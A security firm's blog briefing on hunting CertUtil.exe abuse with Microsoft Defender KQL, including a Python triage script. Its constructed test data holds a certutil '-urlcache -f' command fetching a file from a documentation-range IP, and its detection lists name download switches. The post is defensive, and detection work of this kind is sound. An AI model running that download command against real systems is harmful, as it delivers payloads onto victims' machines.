
The CertUtil Command Downloaded Something At 2:17AM

The executable was signed by Microsoft.

It was already present on every Windows workstation.

No malware had been dropped yet. No exploit had triggered. No antivirus alert had fired.

At 2:17AM, CertUtil.exe downloaded a file from the internet.

That was the moment the investigation began.

Briefing summary

A trusted Microsoft utility downloaded content from an external host during the early hours of the morning. Defender telemetry revealed the command line, parent process and destination URL that explained what was really happening.

Microsoft signed binary
Download occurred after hours
DeviceProcessEvents revealed the activity

What happened

The process did not look unusual at first. That was exactly why it needed a closer look.
The process looked legitimate: CertUtil.exe is a Microsoft-signed utility commonly used for certificate management, certificate store operations and Base64 encoding or decoding of files.
The timing was suspicious: the command executed outside normal business hours and initiated an outbound download from an external host.
The parent process mattered: the download was launched by an unexpected parent process, which moved the investigation from routine utility usage to suspicious execution.

The KQL that changed everything

The evidence lived in Microsoft Defender XDR. The hunt started by finding CertUtil executions that included download-related switches or external URLs.
certutil-download-investigation.kql
DeviceProcessEvents
// TimeGenerated is the Microsoft Sentinel column name for this table; in the
// Defender XDR advanced hunting schema the same field is called Timestamp
| where TimeGenerated > ago(30d)
| where FileName =~ "certutil.exe"
// certutil accepts both -switch and /switch and ignores case, so match on terms
// rather than the literal "-urlcache"; -verifyctl -f also fetches a URL
| where ProcessCommandLine has_any ("urlcache", "verifyctl", "split", "http", "https")
| project
    TimeGenerated, DeviceName, AccountName, FileName,
    ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, SHA1
| order by TimeGenerated desc
The download was intentional: the command line showed CertUtil being used to retrieve content from an external source and write it to a local file.
No custom malware required: attackers abuse built-in Windows tools because the binaries already exist on the device, are signed, and often appear trusted at first glance.
The command line contained the evidence: the URL, output filename, execution switches and parent process together formed the timeline that explained the event.
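The rows the query returns are candidates, not conclusions; each one still has to be read for the switches, the destination, the parent and the time. The triage below is an added example in Python, not GEMXIT's code and not a Defender feature: it runs offline over constructed rows shaped like DeviceProcessEvents and DeviceNetworkEvents output, parses the certutil command line (both the `-` and `/` switch forms, any case), extracts the URL and output path, scores the parent process and time of day, and joins each flagged process to the network events it produced so the destination can be confirmed. The device name, accounts, process ids, times, the 203.0.113.0/24 destination, the parent-process lists and the business-hours window are all constructed or assumed for the example.

```python
"""Triage CertUtil download activity from DeviceProcessEvents-style rows.

Added example, not GEMXIT's code. All rows are constructed (device, accounts,
process ids, times, the 203.0.113.0/24 destination); the parent lists and the
business-hours window are assumptions to tune per environment.
"""
import shlex
from datetime import datetime, timedelta

DOWNLOAD_SWITCHES = {"urlcache", "verifyctl"}      # certutil switches that fetch a URL
BUSINESS_HOURS = range(7, 19)                       # assumption: 07:00-18:59 is normal
EXPECTED_PARENTS = {"services.exe", "svchost.exe", "mmc.exe"}    # assumption
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe",  # assumption
                      "mshta.exe", "wscript.exe", "cscript.exe"}


def parse_certutil(cmdline):
    """Split a certutil command line into (switches, url, output_path).
    certutil accepts '-' and '/' as switch prefixes and ignores case, so a hunt
    for the literal "-urlcache" misses "/urlcache" and "-URLCache"."""
    try:
        args = shlex.split(cmdline, posix=False)    # posix=False keeps backslashes
    except ValueError:                               # unbalanced quote in the line
        args = cmdline.split()
    switches, positional = set(), []
    for arg in args[1:]:
        if len(arg) > 1 and arg[0] in "-/":
            switches.add(arg[1:].lower())
        else:
            positional.append(arg.strip('"'))
    url = next((p for p in positional if p.lower().startswith(("http://", "https://"))), None)
    output = None
    if url is not None and positional.index(url) + 1 < len(positional):
        output = positional[positional.index(url) + 1]   # -urlcache [-f] URL OUTFILE
    return switches, url, output


def triage(row):
    """Score one process row; 0 means certificate work rather than a download."""
    if row["FileName"].lower() != "certutil.exe":
        return 0, []
    switches, url, output = parse_certutil(row["ProcessCommandLine"])
    if url is None and not switches & DOWNLOAD_SWITCHES:
        return 0, []
    score = 1
    reasons = [f"download via {sorted(switches & DOWNLOAD_SWITCHES)} from {url} to {output or '<no path>'}"]
    parent = row["InitiatingProcessFileName"].lower()
    if parent in SUSPICIOUS_PARENTS:
        score += 2
        reasons.append(f"launched by {parent}, a user application with no reason to run certutil")
    elif parent not in EXPECTED_PARENTS:
        score += 1
        reasons.append(f"unexpected parent {parent}")
    if row["TimeGenerated"].hour not in BUSINESS_HOURS:
        score += 1
        reasons.append(f"ran at {row['TimeGenerated']:%H:%M}, outside business hours")
    return score, reasons


def hunt(process_rows, network_rows, window=timedelta(minutes=5)):
    """Flagged executions, highest score first, each joined to the network events
    the same process produced (same device and process id, inside the window)."""
    findings = []
    for row in process_rows:
        score, reasons = triage(row)
        if score == 0:
            continue
        start = row["TimeGenerated"]
        connections = [(n["RemoteIP"], n["RemoteUrl"]) for n in network_rows
                       if n["DeviceName"] == row["DeviceName"]
                       and n["InitiatingProcessId"] == row["ProcessId"]
                       and start <= n["TimeGenerated"] <= start + window]
        findings.append({"device": row["DeviceName"], "account": row["AccountName"], "time": start,
                         "score": score, "reasons": reasons, "connections": connections})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


def _proc(ts, device, account, pid, cmdline, parent):
    return {"TimeGenerated": ts, "DeviceName": device, "AccountName": account, "ProcessId": pid,
            "FileName": "certutil.exe", "ProcessCommandLine": cmdline, "InitiatingProcessFileName": parent}


# Constructed telemetry: the 02:17 download from Word, routine store work from MMC, a CRL fetch by a service.
PROCESS_EVENTS = [
    _proc(datetime(2024, 5, 14, 2, 17), "WS-0142", "jsmith", 4412,
          r'certutil.exe -urlcache -split -f http://203.0.113.45/update.dat "C:\Users\Public\update.dat"',
          "WINWORD.EXE"),
    _proc(datetime(2024, 5, 14, 10, 5), "WS-0142", "pkiadmin", 2208,
          r"certutil.exe -addstore Root C:\certs\corp-ca.cer", "mmc.exe"),
    _proc(datetime(2024, 5, 14, 14, 30), "WS-0142", "SYSTEM", 3120,
          r"certutil /urlcache /f https://pki.example.test/crl/corp.crl C:\Windows\Temp\corp.crl", "svchost.exe"),
]
NETWORK_EVENTS = [
    {"TimeGenerated": datetime(2024, 5, 14, 2, 17, 3), "DeviceName": "WS-0142", "InitiatingProcessId": 4412,
     "RemoteIP": "203.0.113.45", "RemoteUrl": "http://203.0.113.45/update.dat"},
]

if __name__ == "__main__":
    for f in hunt(PROCESS_EVENTS, NETWORK_EVENTS):
        print(f"{f['time']:%H:%M} {f['device']} {f['account']} score={f['score']}", *f["reasons"], *f["connections"], sep="\n  ")
```

Run directly it prints the ranked findings: the Word-launched 02:17 download scores highest and is tied to its outbound connection, the service's daytime CRL fetch scores low, and the certificate-store operation is not flagged at all. In practice the rows come from exporting the hunt results, and the parent lists are tuned to whatever legitimately launches certutil in the environment (PKI tooling, management agents).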

Agent Foskett moment

Everyone focused on the file. Nobody looked at how it arrived.
The binary was trusted: Microsoft signed it, it already existed on the workstation, and nothing about the filename alone looked unusual.
The behaviour was not trusted: legitimate tools can still be used for malicious purposes.

This is where strong endpoint security visibility matters.
The process tree told the story: once the parent process and command line were reviewed, the CertUtil execution was no longer just a utility event. It became evidence.
What it was not: it was not automatically safe because it was signed by Microsoft, and it was not harmless because the file name looked normal.
What it actually was: a built-in Windows utility being used to download content. The action, the timing and the parent process made the event suspicious.
Why it matters: the downloaded payload may only be chapter two. The CertUtil command can be the first clear sign that the intrusion timeline has already started.

What most environments miss

Living-off-the-land activity is easy to overlook when defenders only search for unknown executables.
Living-off-the-land attacks: modern attackers often abuse trusted operating system components instead of bringing obvious malware with them.
Command lines matter: the executable name alone rarely tells the whole story. ProcessCommandLine often contains the evidence defenders need.
Context beats signatures: parent process, user account, device history, network destination and execution timing can reveal more than a traditional signature.

Related investigations

The Child Process Shouldn't Have Existed: unexpected child process activity can reveal the moment a trusted application begins behaving like part of an attack chain.
The PowerShell Command Was Base64 Encoded: encoded PowerShell can hide intent until the command line is decoded and placed into the wider process timeline.
The Process Tree Told The Real Story: process trees often explain what alerts miss by showing what started, what followed and which parent process mattered.
The Process Was Signed By Microsoft: a signed Microsoft process can still be part of suspicious activity when behaviour and context do not match normal use.
The Device Was Talking To Something It Shouldn't: network activity can confirm whether a suspicious command reached out to infrastructure that does not belong in the environment.
KQL Threat Hunting Guide: build practical Microsoft Defender XDR and Sentinel investigations across identity, endpoint, email and cloud signals.

Final thought

Attackers do not always need malware. Sometimes they simply borrow the tools that Windows already provides.
At GEMXIT: we help organisations investigate Microsoft Defender XDR endpoint telemetry, suspicious process execution, command-line evidence and living-off-the-land activity across Microsoft 365 environments. If you want to understand how this applies to your environment, see our Cyber Security services.
Agent Foskett mindset: do not just ask whether the executable is trusted. Ask who launched it, what command line was used, where it connected and what happened next.

CertUtil.exe is not automatically malicious. The command line is where the story begins. Explore related investigations including The Child Process Shouldn't Have Existed, The Process Tree Told The Real Story, and the Base64 PowerShell Investigation.

Develop IT. Protect IT. GEMXIT PTY LTD | GEMXIT UK LTD

Microsoft Defender CertUtil Investigation

This Agent Foskett briefing explains how suspicious CertUtil.exe activity can be investigated using Microsoft Defender XDR, DeviceProcessEvents and KQL when a trusted Windows utility downloads content from an external location.

Detect CertUtil Downloads Using KQL

Microsoft Defender XDR advanced hunting can help defenders investigate CertUtil.exe command lines, parent processes, device names, account names, URLs, hashes and suspicious execution patterns using DeviceProcessEvents.

Living Off The Land Binary Threat Hunting

CertUtil is a built-in Windows utility that can be abused by attackers as a living-off-the-land binary. Defenders should review command-line arguments, process trees, network destinations and execution timing before assuming a trusted executable is safe.